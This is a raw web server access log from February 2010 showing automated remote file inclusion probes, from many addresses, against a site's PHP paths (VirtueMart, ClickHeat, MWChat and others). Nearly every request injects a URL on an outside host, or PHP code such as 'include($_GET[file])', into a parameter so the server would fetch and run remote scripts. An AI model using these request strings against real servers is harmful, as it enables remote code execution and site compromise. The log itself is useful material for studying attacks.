85.13.139.254 - - [11/Feb/2010:06:18:23 -0800] "GET /logs/access_100111.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:18:25 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:18:25 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:18:33 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:18:33 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.92.188 - - [11/Feb/2010:06:20:06 -0800] "GET /logs/access_100104.log///index.php?load=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.92.188 - - [11/Feb/2010:06:20:06 -0800] "GET /logs///index.php?load=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.92.188 - - [11/Feb/2010:06:20:07 -0800] "GET //index.php?load=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:06:20:31 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:06:20:31 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:06:20:31 -0800] "GET /logs/access_100117.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:21:22 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:21:22 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:21:22 -0800] "GET /logs/access_100103.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:21:27 -0800] "GET /logs/access_100103.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:21:27 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:06:21:27 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:22:14 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:22:14 -0800] "GET /logs/access_100204.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:22:15 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:06:22:15 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:06:22:15 -0800] "GET /logs/access_100117.log//skin/happycast_category_lightblack/login.php?dir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:06:22:15 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:06:22:20 -0800] "GET /logs/access_100117.log//skin/happycast_category_lightblack/login.php?dir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:06:22:20 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:06:22:20 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.92.188 - - [11/Feb/2010:06:23:00 -0800] "GET /logs/access_100202.log///index.php?load=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [11/Feb/2010:06:23:09 -0800] "GET /logs/access_100119.log/include/prodler.class.php?sPath=http://foisonseafood.com/include/build/editor/editor-beta.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [11/Feb/2010:06:23:50 -0800] "GET /logs/access_100123.log/include/prodler.class.php?sPath=http://foisonseafood.com/include/build/editor/editor-beta.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:25:07 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [11/Feb/2010:06:28:41 -0800] "GET /administrator/components/com_clickheat/Recly_Config.php=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [11/Feb/2010:06:28:41 -0800] "GET /logs/administrator/components/com_clickheat/Recly_Config.php=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [11/Feb/2010:06:28:41 -0800] "GET /logs/access.log%20%20/administrator/components/com_clickheat/Recly_Config.php=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:06:29:05 -0800] "GET /appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:06:29:05 -0800] "GET /logs/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:06:29:05 -0800] "GET /logs/access_100120.log%20%20/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:06:29:51 -0800] "GET /appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:06:29:51 -0800] "GET /logs/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:06:29:51 -0800] "GET /logs/access_100120.log%20%20/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:30:16 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:30:16 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:30:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:31:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:31:12 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:31:12 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:06:31:17 -0800] "GET /logs/access_100112.log%20%20//index.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:06:31:17 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:06:31:17 -0800] "GET /index.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:06:31:27 -0800] "GET /logs/access_100103.log%20%20//index.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:31:38 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:31:59 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:31:59 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:32:00 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:32:19 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [11/Feb/2010:06:33:21 -0800] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [11/Feb/2010:06:33:21 -0800] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [11/Feb/2010:06:33:21 -0800] "GET /logs/access_100201.log%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [11/Feb/2010:06:33:25 -0800] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [11/Feb/2010:06:33:25 -0800] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [11/Feb/2010:06:33:25 -0800] "GET /logs/access_100201.log%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:33:27 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:06:34:14 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:06:34:14 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:06:34:14 -0800] "GET /logs/access_100105.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:34:23 -0800] "GET /logs/access_100114.log%20%20//searcharrays.php?addonDir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:34:28 -0800] "GET /logs//searcharrays.php?addonDir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:34:28 -0800] "GET /searcharrays.php?addonDir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:06:34:32 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:06:34:32 -0800] "GET /logs/access_100105.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:06:34:32 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [11/Feb/2010:06:34:33 -0800] "GET /logs/access_100103.log%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:34:42 -0800] "GET /logs//searcharrays.php?addonDir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:34:42 -0800] "GET /logs/access_100114.log%20%20//searcharrays.php?addonDir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:34:47 -0800] "GET /searcharrays.php?addonDir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [11/Feb/2010:06:34:48 -0800] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [11/Feb/2010:06:34:48 -0800] "GET /logs/access_100201.log%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [11/Feb/2010:06:34:49 -0800] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [11/Feb/2010:06:34:50 -0800] "GET /administrator/components/com_clickheat/Recly_Config.php=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [11/Feb/2010:06:34:50 -0800] "GET /logs/administrator/components/com_clickheat/Recly_Config.php=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [11/Feb/2010:06:34:50 -0800] "GET /logs/access.log%20%20/administrator/components/com_clickheat/Recly_Config.php=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:06:35:03 -0800] "GET /logs/access_100105.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:35:06 -0800] "GET /searcharrays.php?addonDir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:35:06 -0800] "GET /logs//searcharrays.php?addonDir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:35:09 -0800] "GET /logs/access_100114.log%20%20//searcharrays.php?addonDir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [11/Feb/2010:06:35:17 -0800] "GET /logs/access_100112.log%20%20/administrator/components/com_clickheat/Recly_Config.php=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:06:35:23 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:06:35:23 -0800] "GET /logs/access_100112.log%20%20//index.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:06:35:24 -0800] "GET /index.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:06:35:30 -0800] "GET /logs/access_100103.log%20%20//index.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [11/Feb/2010:06:35:51 -0800] "GET /logs/access_100103.log%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:06:36:38 -0800] "GET /logs/access_100105.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:36:51 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:36:51 -0800] "GET /logs/access_100123.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:36:55 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:37:01 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:37:01 -0800] "GET /logs/access_100123.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:37:04 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:37:11 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:37:20 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:37:23 -0800] "GET /admin/classes/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:37:23 -0800] "GET /logs//admin/classes/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:37:23 -0800] "GET /logs/access_100107.log%20%20//admin/classes/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:37:24 -0800] "GET /admin/classes/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:37:24 -0800] "GET /logs/access_100107.log%20%20//admin/classes/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:37:24 -0800] "GET /logs//admin/classes/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:37:24 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:37:28 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:37:28 -0800] "GET /logs/access_100128.log%20%20//admin/classes/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:37:28 -0800] "GET /logs/access_100128.log%20%20//admin/classes/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:06:37:29 -0800] "GET /logs/access_100114.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:37:35 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:37:35 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:37:35 -0800] "GET /logs/access_100105.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:37:38 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:37:40 -0800] "GET /admin/classes/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:06:37:40 -0800] "GET /logs//admin/classes/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
